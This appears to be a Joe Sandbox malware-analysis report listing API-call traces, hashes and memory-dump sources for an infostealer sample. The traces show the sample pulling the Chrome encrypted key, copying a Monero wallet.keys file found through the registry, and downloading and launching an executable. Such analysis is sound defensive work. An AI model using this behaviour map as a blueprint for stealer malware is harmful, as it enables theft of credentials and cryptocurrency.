                                                              • Part of subcall function 0073C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00FCD6A0), ref: 0073C871
                                                              • Part of subcall function 0073C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0073C87C
                                                              • Part of subcall function 0073C820: memcpy.MSVCRT(?,?,?), ref: 0073C912
                                                            • StrStrA.SHLWAPI(?,00FD05D0,00000000,?,0075145C,00000000,?,00000000,00FCD6A0), ref: 0073CD5A
                                                            • StrStrA.SHLWAPI(00000000,00FCD720), ref: 0073CD71
                                                              • Part of subcall function 0073C820: lstrcatA.KERNEL32(?,00750B46), ref: 0073C943
                                                              • Part of subcall function 0073C820: lstrcatA.KERNEL32(?,00750B47), ref: 0073C957
                                                              • Part of subcall function 0073C820: lstrcatA.KERNEL32(?,00750B4E), ref: 0073C978
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073CE44
                                                            • CloseHandle.KERNEL32(00000000), ref: 0073CE9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                            • String ID:
                                                            • API String ID: 3555725114-3916222277
                                                            • Opcode ID: ba94bd9bc760b1dbba8f1338997f8c2ff2e4b480d28bf86bd40b527005e0e9de
                                                            • Instruction ID: ac323eac4acd31324de36cd288ff8a4d467929d37b4de8a5a3f78645e9739ad9
                                                            • Opcode Fuzzy Hash: ba94bd9bc760b1dbba8f1338997f8c2ff2e4b480d28bf86bd40b527005e0e9de
                                                            • Instruction Fuzzy Hash: 1BE11F72954108FBEB15EBA0DC99FEEB77CEF54300F404169F10662191EF386A4ACB62
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • RegOpenKeyExA.ADVAPI32(00000000,00FCE2B0,00000000,00020019,00000000,007505B6), ref: 007483A4
                                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00748426
                                                            • wsprintfA.USER32 ref: 00748459
                                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0074847B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0074848C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00748499
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                            • String ID: - $%s\%s$?
                                                            • API String ID: 3246050789-3278919252
                                                            • Opcode ID: ae07cadd137b16dc80ed07833d3c00fff6eabcde12cc52f5ba342fd6459a5b65
                                                            • Instruction ID: 3b00029c7c4c66b0ca4b9ba728dec8e25216cd7ddd447b054598f9f0cd3f42bf
                                                            • Opcode Fuzzy Hash: ae07cadd137b16dc80ed07833d3c00fff6eabcde12cc52f5ba342fd6459a5b65
                                                            • Instruction Fuzzy Hash: CA811AB295411CEBEB68DB54CC95FEEB7B8FB48700F008298E109A6180DF756B85CF91
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • memset.MSVCRT ref: 00740C1C
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00740C35
                                                            • lstrcatA.KERNEL32(?,00750D7C), ref: 00740C47
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00740C5D
                                                            • lstrcatA.KERNEL32(?,00750D80), ref: 00740C6F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00740C88
                                                            • lstrcatA.KERNEL32(?,00750D84), ref: 00740C9A
                                                            • lstrlenA.KERNEL32(?), ref: 00740CA7
                                                            • memset.MSVCRT ref: 00740CCD
                                                            • memset.MSVCRT ref: 00740CE1
                                                              • Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
                                                              • Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885
                                                              • Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007496C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00740B85,?,00000000,?,00000000,007505C6,007505C5), ref: 007496E1
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00750D88,?,00000000), ref: 00740D5A
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00740D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                            • String ID: .exe
                                                            • API String ID: 1395395982-4119554291
                                                            • Opcode ID: 8bc71f8a8ad9bccd8fe1229218b9c49ddbe79e9139ac52f5307a0b19bb6c53b1
                                                            • Instruction ID: 5367db6d39eb6168a273d7c9831ba1c506a6617e276f7d704be9c30afb58f98e
                                                            • Opcode Fuzzy Hash: 8bc71f8a8ad9bccd8fe1229218b9c49ddbe79e9139ac52f5307a0b19bb6c53b1
                                                            • Instruction Fuzzy Hash: C38146B1540118FBDB14EB60DD9AFED737CAF44305F004199B70A66091EF786A89CF9A
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0074906C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateGlobalStream
                                                            • String ID: image/jpeg
                                                            • API String ID: 2244384528-3785015651
                                                            • Opcode ID: b926990dd5c6dcbd7a0f1cb8429f8cc1251a01d9ea0a4aa1e1df47fca2db1b39
                                                            • Instruction ID: 67da62ca8848b41029d17f28eb471c88b9c6963ad16814e9f0c66d2e59484811
                                                            • Opcode Fuzzy Hash: b926990dd5c6dcbd7a0f1cb8429f8cc1251a01d9ea0a4aa1e1df47fca2db1b39
                                                            • Instruction Fuzzy Hash: BD71E2B2914208EBDB04DFE4DC99FDEB7B9BF88700F108508F615A7290DB78A945DB61
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00741307
                                                            • strtok_s.MSVCRT ref: 00741750
                                                              • Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
                                                              • Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 348468850-0
                                                            • Opcode ID: a3ae4e632702313b740e8e1584fb5a3ffb22a881c93d91c3217c51dce2aff0c1
                                                            • Instruction ID: 57028187b5d28a878c44b1ce87216a16ace1a1210d6737b25a29e48940f56edc
                                                            • Opcode Fuzzy Hash: a3ae4e632702313b740e8e1584fb5a3ffb22a881c93d91c3217c51dce2aff0c1
                                                            • Instruction Fuzzy Hash: CCC193B694020DEBCB14EF60DC8DFEE7378BB54304F004599E50AA7241EB78AA85CF91
                                                            APIs
                                                            • memset.MSVCRT ref: 0074429E
                                                            • memset.MSVCRT ref: 007442B5
                                                              • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 007442EC
                                                            • lstrcatA.KERNEL32(?,00FCFFB8), ref: 0074430B
                                                            • lstrcatA.KERNEL32(?,?), ref: 0074431F
                                                            • lstrcatA.KERNEL32(?,00FD00C0), ref: 00744333
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 00748D90: GetFileAttributesA.KERNEL32(00000000,?,00740117,?,00000000,?,00000000,00750DAB,00750DAA), ref: 00748D9F
                                                              • Part of subcall function 00739CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00739D39
                                                              • Part of subcall function 00739CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00739D92
                                                              • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                                                              • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                                                              • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                                                              • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
                                                              • Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
                                                              • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                                                              • Part of subcall function 007493C0: GlobalAlloc.KERNEL32(00000000,007443DD,007443DD), ref: 007493D3
                                                            • StrStrA.SHLWAPI(?,00FCFE08), ref: 007443F3
                                                            • GlobalFree.KERNEL32(?), ref: 00744512
                                                              • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
                                                              • Part of subcall function 00739AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                                                              • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
                                                              • Part of subcall function 00739AC0: LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                                                              • Part of subcall function 00739E10: memcmp.MSVCRT(?,v20,00000003), ref: 00739E2D
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 007444A3
                                                            • StrCmpCA.SHLWAPI(?,007508D1), ref: 007444C0
                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 007444D2
                                                            • lstrcatA.KERNEL32(00000000,?), ref: 007444E5
                                                            • lstrcatA.KERNEL32(00000000,00750FB8), ref: 007444F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                            • String ID:
                                                            • API String ID: 1191620704-0
                                                            • Opcode ID: f501928ca226782f57e4cc8b374fffea34e67e8c92bfee37d996ece61374836f
                                                            • Instruction ID: d358284c203cea922d888cf6e2126d587a420edc2d204e3f51192435fc090f5f
                                                            • Opcode Fuzzy Hash: f501928ca226782f57e4cc8b374fffea34e67e8c92bfee37d996ece61374836f
                                                            • Instruction Fuzzy Hash: D37128B6910208F7DB14EBA0DC89FEE7379BB88300F044598F61996181DB78DB55DF92
                                                            APIs
                                                            • memset.MSVCRT ref: 00731327
                                                              • Part of subcall function 007312A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 007312B4
                                                              • Part of subcall function 007312A0: HeapAlloc.KERNEL32(00000000), ref: 007312BB
                                                              • Part of subcall function 007312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007312D7
                                                              • Part of subcall function 007312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 007312F5
                                                              • Part of subcall function 007312A0: RegCloseKey.ADVAPI32(?), ref: 007312FF
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0073134F
                                                            • lstrlenA.KERNEL32(?), ref: 0073135C
                                                            • lstrcatA.KERNEL32(?,.keys), ref: 00731377
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00731465
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                                                              • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                                                              • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                                                              • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
                                                              • Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
                                                              • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                                                            • DeleteFileA.KERNEL32(00000000), ref: 007314EF
                                                            • memset.MSVCRT ref: 00731516
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                            • API String ID: 1930502592-218353709
                                                            • Opcode ID: fea485f7a33824fd62f3c4d023f323fc194d7ca703451a5530b83f39e50a17d7
                                                            • Instruction ID: d3cbc421d38b5cb08b5a8505cfbd115cf55cac9322b575f0a8a1a15a6d718c89
                                                            • Opcode Fuzzy Hash: fea485f7a33824fd62f3c4d023f323fc194d7ca703451a5530b83f39e50a17d7
                                                            • Instruction Fuzzy Hash: AF5147B1D50118E7D715FB60DD96BED737CAF54300F4041A8B60A62092EF786B89CFA6
                                                            APIs
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
                                                              • Part of subcall function 007347B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                                                              • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                                                            • InternetOpenA.WININET(00750DF7,00000001,00000000,00000000,00000000), ref: 0073610F
                                                            • StrCmpCA.SHLWAPI(?,00FCD800), ref: 00736147
                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0073618F
                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007361B3
                                                            • InternetReadFile.WININET(a+t,?,00000400,?), ref: 007361DC
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0073620A
                                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00736249
                                                            • InternetCloseHandle.WININET(a+t), ref: 00736253
                                                            • InternetCloseHandle.WININET(00000000), ref: 00736260
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                            • String ID: a+t$a+t
                                                            • API String ID: 4287319946-2529819367
                                                            • Opcode ID: 3720357b2d802206a8ef20473045d8c406fef04177835282d2258d5146d7fd95
                                                            • Instruction ID: 85ad3be9c392f88d4da6c8dd92508b3871669b0763efbe09a505d7084bdc784c
                                                            • Opcode Fuzzy Hash: 3720357b2d802206a8ef20473045d8c406fef04177835282d2258d5146d7fd95
                                                            • Instruction Fuzzy Hash: 36516FB1A40208FBEB24DF50DC49BEE77B8FB44705F108098A609A71C1DB796A85CF95
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 007431C5
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0074335D
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 007434EA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
